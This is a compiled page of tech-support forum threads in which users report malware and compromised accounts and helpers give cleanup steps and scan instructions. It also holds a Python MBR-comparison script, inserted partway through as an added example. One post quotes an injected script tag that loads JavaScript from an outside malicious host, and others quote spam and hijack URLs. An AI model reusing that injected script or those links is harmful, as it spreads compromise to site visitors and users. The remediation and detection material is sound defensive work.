I also tried to start up and do a scan with the F-Secure recovery boot disc. Again, nothing detected.
Well, I know the ultimate solution would be to format the computer and make a clean install but that would take a lot of time and I am not yet sure if the card was stolen from the computer or with another way.
Oh, and of course I should mention that this specific credit card was just used on very trusted websites like airlines and car rental companies, so no it can't have been stolen from a scam page.
 
So, what do you recommend me to do? Try something else maybe or would you format if you were me?
 
Thanks!

Answer:credit card was compromised, was it malware?

It could have been anything really. For example, a retailer being breached, an ATM skimmer, a restaurant employee skimming the card when it's out of sight, a breach at an online site, keylogging malware, etc. One way card issuers discover breaches is through a pattern of fraudulent charges reported by users, then looking for a common merchant between all of them. If you were quick to notice it and reported the issue proactively, it doesn't eliminate the possibility that you caught it before the card issuer noticed a pattern.
 
If I were you and didn't feel I had the technical ability to dig deeper, I'd stick to credit card-only transactions online and monitor your account regularly. If you see additional fraudulent charges on another card (or two) within a relatively short period of time, then you can probably deduce there is an issue with your machine. At that point, you can format if you're able to without significant loss of time or data. Your liability on fraudulent credit card charges should be little-to-none, which isn't the case with debit so as long as you have the discipline to monitor and report fraudulent charges you shouldn't really be out anything, save for a few phone calls to your card issuer.


Running Windows XP Pro with SP 3:
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.528 [GMT -7:00]

I am hoping someone can look at the combofix log and let me know if I was actually infected with malware.

The computer usually runs TrendMicro Officescan but it was turned off at some point. Computer was running with no issues and no slow downs.

My credit card was compromised on the same day I typed it into a website using Internet Explorer 8. This could just be a coincidence. That is when I saw the antivirus was not running.

Steps done:
- Ran Combofix while computer was running normally - did not show an infection, but files shown under "Other Deletions" section, log attached
- Rebooted in Safe mode and ran combofix again - nothing found
- Ran Malwarebytes - nothing found
- Downloaded next day's Combofix and ran it - nothing found
- Took the files out of the combofix quarantine onto a usb drive, renamed the files back to the original, and ran Malwarebytes against them - nothing found

Answer:Possible Malware, compromised cred card

ComboFix logs are not permitted outside the Virus, Trojan, Spyware, and Malware Removal Logs forum and then only when requested by a Malware Response Team member. Please read the pinned topic ComboFix usage, Questions, Help? - Look here. ComboFix logs, where should I post them?... if you ran ComboFix on your own due to malware infection, please be aware that a ComboFix log is only one part of the disinfection process. Therefore we ask that you please read the pinned topic titled "Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help". When you have done that, post the required logs to include your ComboFix log in that forum, NOT here, for assistance by the Malware Response Team Experts.

If you were the victim of an Internet scam, fraud, hacking or identity theft, you should disconnect the computer from the Internet and from any networked computers until it is cleaned. If your computer was used for online banking, has credit card information or other sensitive data on it, all passwords should be changed immediately to include those used for banking, email, eBay, PayPal and any online activities which require a username and password. You should consider them to be compromised and change passwords from a clean computer, not the infected one. If not, an attacker may get the new passwords and transaction information. Banking and credit card institutions should be notified immediately of the possible security breach. Failure to notify your finan... Read more


Hello,

I have just spent the last 48 hours researching and removing some rather nasty malware from my PC. The malware in question posed as an antivirus program and sent massive pop-ups onto my desktop, changed my web browser home page and shut it down at random and messed about with my registry, among other things. I have resolved all of these issues myself; however, there is one problem that still remains: I am missing several tabs under my Display Properties. The malware program changed my desktop background to a blue screen stating "Warning! Spyware detected on your computer!" and I cannot access the menu to remove it. Likewise, the malware changed my screensaver to a freeware app that simulates a "blue screen of death", but it is dismissed as easily as any other screensaver. Again, I cannot access the menu to change this. While neither of these issues is more than an annoyance, I would like to resolve them and put this whole episode behind me.
Thanks,
Nate K

Answer:Display Properties still compromised after Malware attack

Actually, this seems better suited for the general security issues forum.


Hey. I am new to this so I hope that I am doing this correctly. I have a problem where when I use internet explorer the page says "Your internet privacy is being compromised...". It goes to this web address: http://208.72.172.154/Privacy.warning?xSHA
It says I need special software protection, but when you click on the link, it takes you to the evidence-eliminator website. Hope that is sufficient for an explanation.

Here's my log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:58:04 PM, on 4/24/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\Common Files\Virtual Token\vtserver.exe
C:\WINDOWS\system32\ibmpmsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\IBM\IBM Rapid Restore Ultra\rrpcsb.exe
C:\WINDOWS\System32\QCONSVC.EXE
C:\... Read more

Answer:Your internet privacy is being compromised...malware problem

Welcome to TSF.

Please print the below instructions or copy them to Notepad. Make sure to work through the fixes in the order mentioned below. If there's anything that you don't understand, ask your question(s) before proceeding with the fixes.

Run a scan in HijackThis. Check each of the following if they still exist and hit 'Fix Checked' after you checked the last one:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.supersextube.com/%20to%20...www.google.com

Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update.

- Download the latest version of Java Runtime Environment (get JDK) from http://java.sun.com/javase/downloads/index.jsp and save it to your desktop.
- Just click on the Download button to the right.
- Read the License Agreement and then check the box that says Accept License Agreement. The page will refresh.
- Click on the link to download Windows Offline Installation and save the file to your desktop.
- Close any programs you may have running - especially your web browser.
- Go to Start->Settings->Control Panel, double-click on Add/Remove Programs and remove all older versions of Java.
- Click (highlight) any item with Java Runtime Environment (JRE or J2SE) in the name.
- Click the Remove or Change/Remove button.
- Repeat as many times as necessary to remove all the older Java versions.
- Reboot your ... Read more


Hi,

I had my yahoo account compromised recently.

Essentially, I noticed some failure notices in my email, and then checked the Sent folder, only to find that my email account had sent spammy URLs to the entire contact list!

I was able to change the password, and the Spam stopped sending, however I am concerned about how this occurred.

I'd like to eliminate the possibility of malware on my PC causing this.

Here are the contents my .dds file:


DDS (Ver_10-03-17.01) - NTFSx86
Run by User at 9:49:41.87 on 09/07/2010
Internet Explorer: 8.0.6001.18702 BrowserJavaVersion: 1.6.0_20
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.2038.1426 [GMT -7:00]

AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
svchost.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgchsvx.exe
C:\Program Files\AVG\AVG9\avgrsx.exe
C:\Program Files\AVG\AVG9\avgcsrvx.exe
C:\WINDOWS\system32\spoolsv.exe
svchost.exe
C:\Program Files\AVG\AVG9\avgwdsvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\svchost.exe -k HTTPFilter
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Program Files\LogMeIn\x86\RaMaint.exe
C:\WINDOWS\Explorer.EXE
C:\Program Fil... Read more

Answer:Yahoo Account Compromised - Malware System Check

Hello Jess,

I'm not seeing any malware in these logs. It's difficult to say exactly how your Yahoo account got compromised. One possibility is that one of your contacts was infected and you were spammed by them.

Let's see if an online scan picks up on anything. It can take several hours, so please be patient and allow it to run its full course:

Establish an internet connection & perform an online scan with Firefox or Internet Explorer at Kaspersky Online Scanner

**Note**

To optimize scanning time and produce a more sensible report for review:
Close any open programs.
Turn off the real time scanner of any existing antivirus program while performing the online scan.
Click Accept when prompted to download and install the program files and database of malware definitions.
Click Run at the Security prompt.
The program will then begin downloading and installing and will also update the database.
Please be patient as this can take several minutes.
Once the update is complete, click on My Computer under the green Scan bar to the left to start the scan.
Once the scan is complete, it will display if your system has been infected. It does not provide an option to clean/disinfect. We only require a report from it.
Do NOT be alarmed by what you see in the report. Many of the finds have likely been quarantined.
Click View scan report at the bottom.
Click the Save Report As... button.
Click the Save as Text button to save the file to your desktop so that you may post ... Read more


As an introduction, I'm a casual computer user. I don't know much about technology, but I've noticed these forums bring a lot of help. And I really need it; I'm kind of panicked and have no informed perspective, no inkling of what to do next. A huge thank you to anybody who reviews this.

 
Have an HP Pavilion quad core with, I believe, eight GB of memory. It is a desktop PC; it has Windows 8. I will be happy to provide any more information as needed.
 
So it all started with downloading a version of Photoshop someone confirmed that worked. Bad idea. Normally I'm not that naive. I already had McAfee and avast antivirus installed. 
 
It was a really tempting offer. After I clicked the link, the problem began and inflated.
It immediately confirmed it as malicious, and I x-ed out.
 
This is where I consider the issue started from; I don't think there's anything else I've done to cause this.

 
Suddenly, I began getting certificate warnings in iTunes, Google Chrome, Internet Explorer, you name it. This had never happened to me on the computer before. I can only remember one instance where the URL was suspicious, but it normally wasn't. I even got messages that somebody was connecting to my network/computer, or something similar, via McAfee.
 
There were also times where I would be browsing the Internet, and my click be directed to a random pop up that came out of nowhere. I noticed that my mouse lagged; I read th... Read more

Answer:Malware turning firewall off, certificate warnings, compromised PC?

Hello and welcome to Bleeping Computer! I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
To help Bleeping Computer better assist you please perform the following steps:
*************************************************** In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/554923 <<< CLICK THIS LINK
If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.
***************************************************If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of t... Read more


Log files attached. Various redirects and pop ups whilst browsing.

Cheers,
 

Answer:User's Google Account Compromised - Instructed To Do A Malware Scan

Rerun RogueKiller and have it remove these items:
[RUN][SUSP PATH] HKCU\[...]\Run : PprKjbtu (C:\Users\JULIE\AppData\Local\hmaxyxke\pprkjbtu.exe [x]) -> FOUND
[RUN][SUSP PATH] HKUS\S-1-5-21-2030968110-4071869114-4025464302-1000\[...]\Run : PprKjbtu (C:\Users\JULIE\AppData\Local\hmaxyxke\pprkjbtu.exe [x]) -> FOUND
Then rerun Hitman and have it remove all the PUPs.

Please download Junkware Removal Tool to your desktop.
Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Attach JRT.txt to your next message.
Reboot and rescan with both RogueKiller and Hitman and attach the new logs.

Tell me how things are running.
 



Hi, thanks in advance for your help.

Several weeks ago, my online accounts were compromised. I believe that my computer is the source of the infection, as it started acting funkily, and only accounts that I had accessed from this machine were compromised. I have already changed all of my account information; now is the first chance I've had to fix this computer.

here is my dds.txt:

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.18015
Run by Larry at 16:58:07 on 2015-12-17
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.3561.1328 [GMT -8:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Spybot - Search and Destroy *Enabled/Outdated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Program Files\IDT\WDM\STacSV64.exe
C:\Windows\system32\svchost.exe -k NetworkServi... Read more

Answer:Online accounts compromised. Strongly Suspect Malware/Rootkit

Hello and welcome to TSF Draymond Green,

My name is Tolga and I will assist you with your malware related problems.

Before we move on, please read the following points carefully.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.
First, read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
Please download to and run all requested tools from your Desktop.
Perform everything in the correct order. Sometimes one step requires the previous one.
If you have any problems while following my instructions, Stop there and tell me the exact nature of your problem.
Do not run any other scans without instruction or add/remove software unless I tell you to do so. This would change the output of our tools and could be confusing for me.
Post all logfiles as a reply rather than as an attachment unless I specifically ask you. If you can not post all logfiles in one reply, feel free to use more posts.
If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
Stay with me. I will give you some advice about prevention after the cleanup process. Absence of symptoms does not always mean the c... Read more


On Windows 10, the keyboard is completely unusable; this includes external keyboards. Resetting keyboard language and type has no effect. So I resorted to Lenovo hardware / system restore. When I press the 'recover' button, the recovery / boot BIOS screen appears. But when I select the "System Recovery" option, the 'enter' button behaves like the escape button; the Windows manager boots, not the firmware recovery app. None of the other buttons work except Esc. I was able to run hardware diagnostics. No errors found. I suspect I need to reload all firmware and the hard drive.
 
 
Moderator comment: Model added to subject for clarity.

Answer:S20-30 - Firmware appears compromised by keylogger or malware; Lenovo recovery inoperable.

Good day and welcome to the community.
 
Sorry you're having difficulty. Please provide more information about your system (model, etc.), otherwise it will be difficult for the community to assist you. We will also be able to confirm that your post is in the proper forum. Regards.


Hello.  I seem to be sharing my firewall privileges with a remote hacker and a system restore didn't help.  A similar posting at Tom's Hardware pointed to a corrupted/malware rundll32.exe file creating extraneous malware files (guard.tmp, filename.dll) in his Win/System32 folder.  I suspect I have something similar though couldn't find those same file names.  (His posting is here: http://www.tomshardware.com/forum/134388-45-mysterious-rundll32-administrator-privileges )
 
I have tried kaspersky, combofix, rskiller, hitman, symantec, emsisoft, avg, symantec, windows defender, etc.  I am not a tech guy by trade but serve as my own IT guy some months so any help I get is welcome.  I probably am supposed to be posting "hijack this" findings or something as a first step but haven't done anything like that in 12 years so I figured I would post my problem first.  Thank you.


Esteemed Forum Members,

This is my first posting here. I am a Java programmer/developer. And I look forward to participating. Although I generally find that I learn more from reading the posts of the knowledgeable folks here than with me talking.

My current question is to see if anyone knows any more about a computer affliction that has affected two friends in the past week. (They are in different groups, so these are separate "afflictions".)

The two are remarkably similar so I am hypothesizing that they are basically the same attack. I suspect that if I have bumped into two of these cases, you folks may have already been there and done that.

As I don't have access to either of their computers, and as they are rather naive MS Windows users, it might be difficult for me to run the various diagnostic tools on their systems.

Basically the symptom is that they received an email from a known source. (Yeah, I know...) And clicked on a link to one of the {canxhealth health24x medhealthx xmedx } dotcom websites. The result is that, at a minimum, their Yahoo email account was compromised and an email was sent out to all of their contacts. The sent email has no subject and contains only the link to the malware website.

Googling through the web, I see suggestions ranging from changing the email account password through reformatting the hard-drive and resetting external routers. I also see claims that none of the major anti-virus/firewall applications detect this... Read more

Answer:Yahoo Account Compromised, possible system compromised

Hello Chuck. First, I will move you one forum down to Am I Hacked. Please read the first pinned topic there, Who To Contact If Your Yahoo Webmail Account Is Hacked. Next, follow these instructions, also a pinned topic there: How to receive help in the Am I Hacked? forum


My computer recently got a virus or worm or malware or something... Anyway, there was a huge amount of pop ups and executables going off. I shut down Windows and they haven't reemerged, but there is about a 50% drop in speed.

Running Windows XP Pro SP3

Here's what scans I ran (thorough scans):
-Avast
-Symantec Antivirus(installed after lag remained and removed avast)
-Spybot Search and Destroy
-A-Squared Free
-CCleaner

Basically, when I ran any of the above (excluding CCleaner) it turned off my computer... I booted up in Safe Mode and tried the scans again, and it shuts down at some point during the scan... I'm guessing it's a virus that shuts down the computer when scanned... so any hints? I don't really want to reinstall Windows, since I got this CD key cheaply from my school, but it's only a one-time install key supposedly... I'm guessing this is possibly a bad worm, since my computer is semi-laggy... and I tried installing WoTLK and it took 2 hours to do on a machine I bought 1 year ago which was considered high end then.

HijackThis log
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 3:13:03 PM, on 11/27/2008
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16735)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEn... Read more


Yesterday everyone in my Gmail contacts received an email from myself, and in the body was a link and that's all it was: "ivoges.com.br/limpallo.html". I immediately changed all my email passwords. I have run Spybot and McAfee full scans and they found nothing. I also don't believe my computer was even on when they were sent. The day before, I upgraded to IE9. Is there anything else I should do? I am running Vista and IE 9 and here is my HijackThis log.

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 4:25:42 PM, on 4/8/2011
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\NVIDIA Corporation\nTune\nTuneCmd.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD.exe
C:\hp\support\hpsysdrv.exe
C:\WINDOWS\System32\CtHelper.exe
C:\Program Files\McAfee.com\Agent\mcagent.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\WINDOWS\ehome\ehtray.exe
C:\Windows\ehome\ehmsas.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\hp\kbd\kbd.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\Macromed\Flash\FlashUtil10o_ActiveX.exe
C:\Program Files\Trend Micro\HiJackThis\HiJackThis.exe

R1 - HKCU\Software\Microsoft\Internet ... Read more


A virus got hold of my FTP details and added some malicious JavaScript to it (I was using FileZilla, did this contribute?). I'm in the process of taking the site down but Avira didn't report any detections in relation to this. It was bad code though, so all it did was break the script. Here's what it looks like:

<html><body><script type="text/javascript" src="http://nw-cpm.cz.cc/media.js"> </script></body></html>

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 2:13:21 PM, on 26/03/2011
Platform: Windows 7 (WinNT 6.00.3504)
MSIE: Internet Explorer v8.00 (8.00.7600.16385)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\WhatPulse\WhatPulse.exe
C:\Program Files (x86)\DU Meter\DUMeter.exe
C:\Users\Trung\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
C:\Program Files (x86)\Dell DataSafe Online\DataSafeOnline.exe
C:\Program Files (x86)\Dell Support Center\bin\sprtcmd.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Fi... Read more

Answer:Virus - Website FTP details compromised

Hello and welcome to Bleeping Computer. We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

If you have since resolved the original problem you were having, we would appreciate you letting us know. If not, please perform the following steps below so we can have a look at the current condition of your machine. If you are unable to create a log because your computer cannot start up successfully, please provide detailed information about the Windows version you are using: what we in particular need to know is version, edition and if it is a 32bit or a 64bit system. If you are unsure about any of these characteristics, just let us know and we'll help you figure it out. Please also tell us if you have your Windows CD/DVD handy.

Please include a clear description of the problems you're having, along with any steps you may have performed so far.

Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process. Even if you have already provided information about y... Read more


Hello,

Yesterday evening, I received an e-mail that someone is trying to access my Yahoo! Account and I was advised to change my secret questions.

I signed into my e-mail and changed my questions. After a few minutes, I got a notification e-mail that my password has been changed. After that, that my account details have been changed.

I signed in from another PC (happily lying around and connected to the internet) and saved what I could, and what was most important. His goal, my PayPal account.

My idea is that I've been infected with a key logger of some sort and when I typed the password and the secret questions, I gave up my Yahoo! mail.

Now, I will try to see what I can do with my account, maybe get it back, but I feel that my security has been compromised.

I deleted all my cookies from this PC, I scanned the PC for viruses with Symantec Antivirus but found nothing.

I wish to ask, what can I do so I can securely log in to my accounts from this computer? (without formatting everything)

Ideas are appreciated.

Sincerely,
Andrei

Answer:Undetected virus may have compromised my Yahoo!

Sorry for the bump, but I really need some piece of advice...


My anti-virus software keeps closing down mid scan, and my browsers have been infected with the '100ksearches' trojan where all my search results get redirected to other sites. Please help, have tried running several anti-virus and trojan killing software in safe mode but when I boot up back in normal mode the same things happen.

Answer:Anti-virus software compromised

nassman,

The infection will return if its source is the Master Boot Record. It loads the infection as soon as you boot into Windows!

For this reason, please download aswMBR: http://public.avast.com/~gmerek/asw... Save it to the Desktop. XP users - Double-click aswMBR.exe to start the tool.
Click Scan.
Upon completion of the scan, click 'Save log' and save it to the Desktop. Note - Do NOT attempt to fix anything!!
Please post the log produced by aswMBR in your next reply.
Also, you will notice that another file is created on the Desktop. It is named MBR.dat. If you have a USB flash drive, please move the mbr.dat file to it. If not, move the mbr.dat from the Desktop to the C:\ drive. This is important, just in case we need to have access to the MBR information!!

Next, download TDSSKiller: http://support.kaspersky.com/downlo...
Execute TDSSKiller.exe by double-clicking on it.
Click: 'Start Scan'
If malicious objects are found, do NOT allow the tool to Cure! Click the arrow next to 'Cure' and select Skip. We need to see the report first, as it may show false detections!!
Click: 'Continue'
When the tool is done, a log is produced at the root drive, which is typically C:\ For example, C:\TDSSKiller.2.4.0.0_24.07.2010_13.10.52_log.txt
Also post the TDSSKiller log in your reply.

~~~~Retired - Doin' Dis, Dat, and slapping malware.

24 more replies
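The reply above asks for MBR.dat to be kept "just in case we need to have access to the MBR information": a saved copy of sector 0 lets you see exactly what a bootkit patched. The following is an added example in Python, not code from the thread or from aswMBR or TDSSKiller. It assumes MBR.dat is a raw 512-byte copy of sector 0 (an assumption; adjust the read if your dump has a header), decodes the boot signature, disk signature and partition table, and reports the byte ranges where the boot code of a current image differs from the saved copy. A TDSS-style bootkit rewrites the boot code and leaves the partition table alone, so the two are reported separately. The sample images are constructed in the code (placeholder boot code, one NTFS partition, two patched ranges).

```python
"""Check a raw MBR image and compare its boot code against a saved copy (added example)."""
import hashlib
import struct
import sys

MBR_SIZE = 512
BOOT_CODE_LEN = 440        # bootstrap code lives in bytes 0..439
DISK_SIG_OFF = 440         # 4-byte Windows disk signature, then 2 reserved bytes
PART_TABLE_OFF = 446       # four 16-byte partition entries
PART_ENTRY_LEN = 16
SIGNATURE_OFF = 510        # 0x55 0xAA boot signature


def parse_mbr(data: bytes) -> dict:
    """Decode a 512-byte MBR: boot signature, disk signature, boot-code hash, partitions."""
    if len(data) != MBR_SIZE:
        raise ValueError(f"expected {MBR_SIZE} bytes, got {len(data)}")
    partitions = []
    for index in range(4):
        off = PART_TABLE_OFF + index * PART_ENTRY_LEN
        # status, 3 bytes CHS start (skipped), type, 3 bytes CHS end (skipped), LBA start, sectors
        status, ptype, lba_start, sectors = struct.unpack_from("<B3xB3xII", data, off)
        if ptype == 0:
            continue  # empty slot
        partitions.append({"index": index, "bootable": status == 0x80, "type": ptype,
                           "lba_start": lba_start, "sectors": sectors})
    return {
        "signature_ok": data[SIGNATURE_OFF:SIGNATURE_OFF + 2] == b"\x55\xaa",
        "disk_signature": struct.unpack_from("<I", data, DISK_SIG_OFF)[0],
        "boot_code_sha256": hashlib.sha256(data[:BOOT_CODE_LEN]).hexdigest(),
        "partitions": partitions,
    }


def diff_boot_code(saved: bytes, current: bytes) -> list:
    """Return (offset, length) runs where the current boot code differs from the saved copy."""
    runs, start = [], None
    for i in range(BOOT_CODE_LEN):
        if saved[i] != current[i]:
            if start is None:
                start = i
        elif start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, BOOT_CODE_LEN - start))
    return runs


def assess(saved: bytes, current: bytes) -> dict:
    """Compare a saved MBR.dat against the MBR read now. A bootkit patches the boot code
    but usually leaves the partition table intact, so the two are reported separately."""
    changes = diff_boot_code(saved, current)
    saved_p, current_p = parse_mbr(saved), parse_mbr(current)
    return {
        "signature_ok": current_p["signature_ok"],
        "boot_code_changed": bool(changes),
        "changed_ranges": changes,
        "partition_table_changed": saved_p["partitions"] != current_p["partitions"],
    }


def build_sample_mbr() -> bytes:
    """Constructed clean MBR for the demo: placeholder boot code, one bootable NTFS partition."""
    boot_code = b"\xfa\x33\xc0\x8e\xd0" * 88                      # 440 bytes of stand-in code
    disk_sig = struct.pack("<IH", 0x1234ABCD, 0)                   # disk signature + reserved
    entry = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 204800)     # bootable, type 7 (NTFS)
    table = entry + bytes(PART_ENTRY_LEN * 3)                      # three empty slots
    return boot_code + disk_sig + table + b"\x55\xaa"


def tampered_sample(clean: bytes) -> bytes:
    """Constructed 'infected' copy: two patches in the boot code, partition table untouched."""
    mbr = bytearray(clean)
    mbr[0x10:0x18] = b"\xe8\x00\x00" + b"\x90" * 5   # a call hooked in near the entry point
    mbr[400] = 0x00                                  # a single-byte patch further down
    return bytes(mbr)


if __name__ == "__main__":
    if len(sys.argv) == 3:   # usage: mbrcheck.py MBR.dat current.bin
        with open(sys.argv[1], "rb") as f, open(sys.argv[2], "rb") as g:
            saved, current = f.read(MBR_SIZE), g.read(MBR_SIZE)
    else:                    # no files given: run against the constructed sample
        saved = build_sample_mbr()
        current = tampered_sample(saved)
    report = assess(saved, current)
    print("boot signature ok:", report["signature_ok"])
    print("partition table changed:", report["partition_table_changed"])
    for off, length in report["changed_ranges"]:
        print(f"boot code differs at offset {off:#05x}, {length} byte(s)")
```

Read the current sector with a tool that bypasses the running kernel if you can (a rescue disk, or the disk attached to a clean machine), because a rootkit that hooks disk I/O can hand you the clean sector while the real one is patched; that is also why the thread wants the log before any "Cure".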

So yesterday while I was using Registry First Aid, a pop up mimicking windows appears and of course I clicked it, and now I have a virus problem.

Whenever I try to open any sort of adware or virus software I get a pop up that says "Windows cannot access the specified device, path, or file. You may not have the appropriate permissions to access the item.". Most online virus scanners do not work as well, including browsers. I have ceased to use that computer for the mean time.

Additionally, I've received a call from my credit card company and it looks like I have some credit card fraud issues I have to deal with.
Therefore I would like to get rid of this virus as soon as possible and if not, then I'll reformat.

If anyone could help it would be greatly appreciated.

Thank You,
Michael

Answer:Virus Problem - Credit Card Compromised!

Hello...

One or more of the infections is most likely a backdoor trojan, as your symptoms indicate. This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable, and it would be wise to contact those same financial institutions to apprise them of your situation.

Though the trojan has been identified and can be killed, because of its backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:
How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall

We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do.

You can try this if you like.
Please download Rkill by Grinler and save it to your desktop.
Link 2
Link 3
Link 4
Double-click on the Rkill desktop icon to run the tool.
If using Vista, right-click on it and Run As Administrator.
A black DOS box will briefly flash and ... Read more

1 more reply

My entire computer has been compromised. I no longer have access to my C: drive; anything I touch on my taskbar gives me error messages 0x80070005, 0x800c0008 and code 1203. My current Microsoft acct has been linked to an old Microsoft acct I closed, so anything I try to download is stopped by the closed Microsoft acct and there's absolutely nothing I can do. I've tried rebooting to factory settings using the HP disks I purchased and they are not working. When I go into the system and try to add my acct name to the properties I instantly see that code S12545645 show up instead of the Microsoft acct I set up for my computer. I don't know what to do at this point. Every time I try to restore, when I go into settings I notice my computer is being remotely changed by way of VPN settings and there is nothing I can do to change it to prevent it from happening. Any advice would be helpful. I'm literally at the point where I want to throw this computer away, but I just purchased it less than a year ago.

Answer:Computer compromised

Hi: Try a clean install of W10 by making your own plain W10 installation media by using the Media Creation tool at the link below. https://www.microsoft.com/en-us/software-download/windows10

3 more replies

Hi all,

